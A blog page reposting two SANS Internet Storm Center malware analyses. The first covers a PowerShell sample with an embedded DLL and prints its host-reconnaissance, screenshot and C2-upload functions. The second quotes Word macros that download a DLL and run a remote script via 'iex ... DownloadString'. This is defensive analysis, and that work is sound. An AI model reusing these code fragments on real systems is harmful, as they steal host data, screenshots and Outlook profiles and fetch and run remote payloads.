Blog

Archive for September 5th, 2019

PowerShell Script with a builtin DLL, (Fri, Sep 6th)

Attackers are always trying to bypass antivirus detection by using new techniques to obfuscate their code. I recently found a bunch of scripts that encode part of their code in Base64. The code is decoded at execution time and processed via the ‘IEX’ command:

iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("...Base64-data...")

Another technique used by malware developers is to inject a malicious DLL into a running process. Yes, Powershell can do awesome stuff. Yesterday, I spotted a script that hides its malicious code split in the two techniques. One part of the code is Base64 encode but some functions are directly called from a DLL loaded at run time.

First, the code is uncompressed and decoded, then loaded into the Powershell process:

$Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(“…”), [IO.Compression.CompressionMode]::Decompress)
$joqOfPjY = New-Object byte[](20480)
$Z4GoLn.Read($joqOfPjY, 0, 20480) | Out-Null
[System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null

Once the DLL is loaded, it’s now possible to call all functions provided by the library. This is achieved by referencing the custom type and the method (“[custom.type]::method()”):

[QE7K9ZJvi46.QE7K9ZJvi46]::p9Dq()

You can find all the functions in the DLL using your favourite disassembler:

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             void p9Dq-57-8272()
             void                       
                             p9Dq-57-8272
        0040205c 28 06           SUB        byte ptr [ESI],AL
        0040205e 00 00           ADD        byte ptr [EAX],AL
        00402060 0a 6f 07        OR         CH,byte ptr [EDI + 0x7]
        00402063 00 00           ADD        byte ptr [EAX],AL
        00402065 0a 0a           OR         CL,byte ptr [EDX]
        00402067 28 08           SUB        byte ptr [EAX],CL
        00402069 00 00           ADD        byte ptr [EAX],AL
        0040206b 0a 6f 09        OR         CH,byte ptr [EDI + 0x9]
        0040206e 00 00           ADD        byte ptr [EAX],AL
        00402070 0a 6f 0a        OR         CH,byte ptr [EDI + 0xa]
        00402073 00 00           ADD        byte ptr [EAX],AL
        00402075 0a 17           OR         DL,byte ptr [EDI]
        00402077 8d 0e           LEA        ECX,[ESI]
        00402079 00 00           ADD        byte ptr [EAX],AL
        0040207b 01 13           ADD        dword ptr [EBX],EDX
        0040207d 04 11           ADD        AL,0x11
        0040207f 04 16           ADD        AL,0x16
        00402081 1f              POP        DS
        00402082 2d 9d 11        SUB        EAX,0x6f04119d
                 04 6f
        00402087 0b 00           OR         EAX,dword ptr [EAX]

What does the malware do? First, it collects information about the infected host:

function kvhLZVVHv40()
{
    if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
    {
        $HmHCMAj1gp = "DOMAIN: NO`n`n"
    } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"}
    $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
    $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
    $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
    $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
    $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
    $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
    $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
    $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
    $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
    $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "rootSecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
    $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
    PMQty 0 $V6VCS
}

Collected data are sent to a C2:

function PMQty([int]$Wg94, [byte[]]$V6VCS)
{
    $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
    $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
    (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
}

The C2 is contacted via a Base64-encoded IP address and the DLL function EA2gkql9ya() generates random URI like:

hxxps://23[.]227[.]193[.]48/ddqxyg/g1/cbahpbp1y/im/g/asg/3izld2/2s5kq5xexs4h5mwc/xr51fqv2p/4zm/e.jpg

Using the same technique, the malware exfiltrates the content of the following registry keys (related to different versions of Outlook):

  • hkcu:SoftwareMicrosoftOffice16.0OutlookProfiles*9375CFF0413111d3B88A00104B2A6676*
  • hkcu:SoftwareMicrosoftOffice15.0OutlookProfiles*9375CFF0413111d3B88A00104B2A6676*
  • hkcu:SoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesOutlook9375CFF0413111d3B88A00104B2A6676*

What could be also interesting? A screen capture of the desktop! Here is the function which performs the screenshot:

function cY0yMOo7U3()
{
    Add-Type -Assembly System.Windows.Forms
    $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
    $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
    $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
    $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
    $ntkkayAduow.Dispose()
    $UkzcuaUqgj = New-Object System.IO.MemoryStream
    $noFMcdA6cKj=40
    $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
    $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
    $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
    $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
    $Rpmv5HB.Dispose()
    $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
    $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
    PMQty 2 $V6VCS
}

Once initial data have been exfiltrated, the malware enters a loop. It queries the C2 at random interval:

Start-Sleep -s (Get-Random -Input @(200..260))

Depending on the C2 answer, the malware performs the following tasks:

  • Execute the provided PowerShell code and send results back (remote code execution)
  • Dump a DLL on disk with a random name
  • Dump a PE on disk with a random name and executes it

Unfortunately, the C2 is down at the moment, so I can’t grab the DLL/PE files.

The script (SHA256:9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b) has a very low VT score (3/57)[1].
The DLL (SHA256:18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3) has a score of 6/71[2].

[1] https://www.virustotal.com/gui/file/9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b/detection
[2] https://www.virustotal.com/gui/file/18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Private IP Addresses in Malware Samples?, (Thu, Sep 5th)

I’m looking for some samples on VT that contains URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious. Why would a malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen()
'
' test Macro
'
'
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "loader.dll", 0, 0)

End Sub

This one seems to be ongoing development and does not look too dangerous. But, wait, the use of VirusTotal can be very sensitive depending on your context and submitting files to VirusTotal must be performed carefully. If you are a Blue-teamer, uploading a sample might ring a bell at the attacker and let him know that you’re looking at him. If you’re a Red-teamer, uploading your self-made sample might help AV vendors to improve their detection mechanisms.

Here is another one found in another document with a higher VT score (22/57)[3]

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I found also a lot of DLL’s and DEX files (Dalvik Executable from Android applications) that contains URLs with RFC1918 IP addresses.  I think that most of them are samples still being tested/developed.

[1] https://tools.ietf.org/html/rfc1918
[2] https://www.virustotal.com/gui/file/c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a/detection
[3] https://www.virustotal.com/gui/file/cdd3bdced038414f84c318fdc4b2e6573e99900fb792dd417869721cc7975b84/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →